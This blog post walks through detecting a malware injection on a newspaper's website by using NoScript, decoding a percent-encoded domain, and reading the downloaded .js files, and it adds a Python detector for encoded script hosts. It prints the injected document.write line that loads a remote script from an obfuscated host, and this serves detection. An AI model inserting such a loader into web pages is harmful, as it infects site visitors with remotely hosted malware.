I usually suggest using Firefox with the NoScript plugin for safer web browsing. This combo will save you from most web threats. Just remember one rule: never use the “Allow this page” and the “Allow Scripts Globally” options.
NoScript is also a great helper in revealing tricky website exploits.
Let me use the “Telegram .com” case to show how I use it.
Telegram .com is the website of a Worcester, MA newspaper. Google currently lists this site as suspicious, and many browsers (Firefox 3, Safari, Google Chrome) display a warning when you visit it.
Google’s Safe-Browsing diagnostic page says:
Malicious software is hosted on 3 domain(s), including baidubadu .com/, tibetanpic .com/, dsaff .com/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including xxyou .net/.
I usually start my investigations with Unmask Parasites. It is the fastest and safest way to detect many types of website security issues. However, this time the report only stated that Google listed this site as suspicious.
It was time to enable telegram .com in the NoScript menu. I clicked “Temporarily allow telegram .com”. When the page reloaded, I right-clicked on the NoScript icon and found a new suspicious entry in the menu: “Allow http: //%78%78%79%6F%75%2E%6E%65%74”
I decoded this URL: %78%78%79%6F%75%2E%6E%65%74 = xxyou .net
Bingo! This is the site mentioned as an intermediary on Google’s diagnostic page.
The fact that this domain appeared only after enabling scripts on telegram .com means that the “xxyou .net” reference was hidden somewhere in the .js files on the telegram .com web server.
I downloaded the .js files using wget. Sure enough, at the very bottom of the “/assets/AC_RunActiveContent.js” file I discovered the following code:
document.write('<script src=http: //%78%78%79%6F%75%2E%6E%65%74 /msn.gif></script>');
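The same check can be run over downloaded .js files without opening the site in a browser. The Python script below is an added example, not part of the original investigation: it flags script tags (including ones written through document.write) whose hostname is percent-encoded and reports the decoded name. The sample input is constructed and uses the placeholder host example.invalid.

```python
import re
from urllib.parse import unquote

# src= value (quoted or bare) of a <script> tag, including tags that only
# exist inside document.write() string literals.
SCRIPT_SRC = re.compile(r"<script[^>]*?\bsrc\s*=\s*[\"']?([^\s\"'>]+)", re.I)
# Host part of an absolute or protocol-relative URL.
HOST = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//([^/?#]+)", re.I)

def find_encoded_script_hosts(js_text):
    """Return (line_no, raw_host, decoded_host) for every script tag whose
    hostname is hidden behind percent-encoding."""
    findings = []
    for line_no, line in enumerate(js_text.splitlines(), 1):
        for src in SCRIPT_SRC.findall(line):
            match = HOST.match(src)
            if not match:
                continue  # relative URL: served by the site itself
            raw = match.group(1)
            if "%" in raw:  # legitimate code has no reason to encode a hostname
                findings.append((line_no, raw, unquote(raw).lower()))
    return findings

# Constructed sample: a legitimate file with one line appended at the bottom.
SAMPLE_JS = """\
function AC_Generateobj(objAttrs) { /* legitimate code */ }
document.write('<script src="/assets/menu.js"></script>');
document.write('<script src="http://cdn.example.org/lib.js"></script>');
document.write('<script src=http://%65%78%61%6D%70%6C%65%2E%69%6E%76%61%6C%69%64/msn.gif></script>');
"""

if __name__ == "__main__":
    for line_no, raw, decoded in find_encoded_script_hosts(SAMPLE_JS):
        print(f"line {line_no}: {raw} -> {decoded}")
```

To scan a real download, read each file saved by wget and pass its text to find_encoded_script_hosts().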
I hope that, despite this hack, Telegram .com has decent webmasters and sysadmins who will figure out how their site was infected and prevent any recurrence. This article is about detection only. (Update: After posting this article, I checked the site again and the malicious script was gone.)
If you know any other NoScript tricks, please share them in the comments section below. If you have any other security-related tips and tricks and want to share them with readers of my blog, you can contact me and offer a guest post.